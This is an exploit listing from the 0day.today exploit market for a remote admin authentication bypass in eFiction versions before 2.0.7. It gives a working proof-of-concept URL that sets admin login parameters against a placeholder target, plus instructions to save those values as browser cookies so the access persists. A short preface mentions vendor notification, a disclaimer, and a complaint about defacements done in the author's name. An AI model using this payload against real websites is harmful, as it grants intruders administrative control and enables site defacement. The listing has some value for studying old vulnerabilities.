[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

Author
Vipsta
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-744
Category
web applications
Date add
24-08-2006
Platform
unsorted
=================================================================
eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability
=================================================================



##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also illegally defacing 
these websites under MY name, which is a shame because they ripped it from a private discussion 
on g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone, 
nor act in this type of activity. I suggest whomever is defacing websites under my name stop, 
since you would gain more notorioty under your own name.
##########################################

http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1

Use firefox's extension "add n edit cookies" to add these to your cookies so they stick. 
(ie: instead of $_GET['loggedin'] its $_COOKIE['loggedin'] which stays with each page)



#  0day.today [2024-12-26]  #